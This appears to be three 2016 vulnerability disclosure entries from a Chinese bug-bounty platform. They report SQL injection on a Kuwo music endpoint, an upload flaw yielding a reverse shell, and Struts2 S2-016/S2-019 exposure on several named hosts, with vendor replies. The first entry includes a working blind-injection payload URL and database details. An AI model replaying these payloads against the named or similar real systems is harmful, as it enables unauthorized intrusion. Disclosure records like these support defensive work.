漏洞详情披露状态： 2016-04-25： 细节已通知厂商并且等待厂商处理中2016-04-26： 厂商已经确认，细节仅向厂商公开2016-05-06： 细节向核心白帽子及相关领域专家公开2016-05-16： 细节向普通白帽子公开2016-05-26： 细节向实习白帽子公开2016-06-10： 细节向公众公开简要描述：rt详细说明：存在注入的URLmask 区域*****%E7%82%B9&time=1460765040&page=***** 注入点：index手动注入实验可注入，类型code 区域boolean-based blindcode 区域Parameter: index(GET) Type: boolean-based blind Title: and boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: http://rewu.kuwo.cn/album/message/commmessage?topcolumn=%E8%A7%82%E7%82%B9&time=1460765040&page=1&index=101913 and 3478=3478&randnum=0.1987865 back-end DBMS: MySQL 5.0.12 ---ROOT权限注入,current-usercode 区域[email protected]/* */%current-dbcode 区域EDITOR 漏洞证明： 修复方案：参数过滤版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：7确认时间：2016-04-26 10:52厂商回复：感谢对酷我的支持，我们将尽快进行修复！最新状态：暂无

漏洞详情披露状态： 2016-05-05： 细节已通知厂商并且等待厂商处理中2016-05-05： 厂商已经确认，细节仅向厂商公开2016-05-15： 细节向核心白帽子及相关领域专家公开2016-05-25： 细节向普通白帽子公开2016-06-04： 细节向实习白帽子公开2016-06-19： 细节向公众公开简要描述：rt详细说明：注册后上传图片，直接poc，成功反弹 漏洞证明：注册后上传图片，直接poc，成功反弹 修复方案： 版权声明：转载请注明来源 凌零1@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：10确认时间：2016-05-05 21:57厂商回复：感谢您的反馈，我们已经跟进最新状态：暂无

漏洞详情披露状态： 2016-05-01： 细节已通知厂商并且等待厂商处理中2016-05-03： 厂商已经确认，细节仅向厂商公开2016-05-13： 细节向核心白帽子及相关领域专家公开2016-05-23： 细节向普通白帽子公开2016-06-02： 细节向实习白帽子公开2016-06-17： 细节向公众公开简要描述：RT详细说明： code 区域http://www.8dov.cn:8086code 区域http://t.abic.cn:9085/GalaxyEarth/code 区域http://map.ab95569.cn/漏洞编号s2-016 s2-019漏洞证明：  修复方案：版本升级版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：低漏洞Rank：5确认时间：2016-05-03 09:49厂商回复：感谢你们所做的工作最新状态：暂无